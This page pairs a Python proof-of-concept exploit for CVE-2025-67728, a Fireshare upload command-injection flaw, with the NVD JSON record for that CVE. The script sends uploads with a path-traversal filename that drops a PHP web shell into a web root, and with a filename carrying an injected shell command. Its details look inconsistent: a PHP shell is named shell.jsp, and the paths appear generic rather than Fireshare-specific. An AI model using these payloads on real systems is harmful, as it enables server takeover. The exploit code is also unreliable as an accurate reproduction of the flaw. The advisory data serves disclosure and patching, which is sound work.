CVE-2025-67728

#!/usr/bin/env python3 """ CVE-2025-67728 PoC - Fireshare Video Upload Path Traversal/RCE Note: This is for educational and authorized testing purposes only """ import requests import urllib.parse TARGET_URL = "http://target:5000" # Replace with target URL def exploit_path_traversal(): """Exploit path traversal to write file to arbitrary directory""" # Malicious filename with path traversal filename = "../../../../../../../var/www/html/uploads/shell.jsp" files = { 'file': (filename, '<?php system($_GET["cmd"]); ?>', 'video/mp4') } try: response = requests.post(f"{TARGET_URL}/upload", files=files) print(f"[*] Path traversal exploit sent") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") def exploit_rce(): """Exploit command injection for RCE""" # Malicious filename with command injection filename = ";touch /tmp/pwned;#" files = { 'file': (filename, 'dummy video content', 'video/mp4') } try: response = requests.post(f"{TARGET_URL}/upload", files=files) print(f"[*] Command injection exploit sent") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": print("[*] CVE-2025-67728 Fireshare Exploit PoC") print("[*] Target: " + TARGET_URL) # Run exploits # exploit_path_traversal() # exploit_rce()

{"cve": {"id": "CVE-2025-67728", "sourceIdentifier": "[email protected]", "published": "2025-12-12T07:15:45.250", "lastModified": "2025-12-22T19:05:45.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fireshare facilitates self-hosted media and link sharing. Versions 1.2.30 and below allow an authenticated user, or unauthenticated user if the Public Uploads setting is enabled, to craft a malicious filename when uploading a video file. The malicious filename is then concatenated directly into a shell command, which can be used for uploading files to arbitrary directories via path traversal, or executing system commands for Remote Code Execution (RCE). This issue is fixed in version 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shaneisrael:fireshare:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "30E24CA7-FC23-4509-8F87-ACEE1ADD5BDB"}]}]}], "references": [{"url": "https://github.com/ShaneIsrael/fireshare/commit/157386c85f6683f89192dae52115069b435b6d34", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ShaneIsrael/fireshare/security/advisories/GHSA-c4f5-g622-q72m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}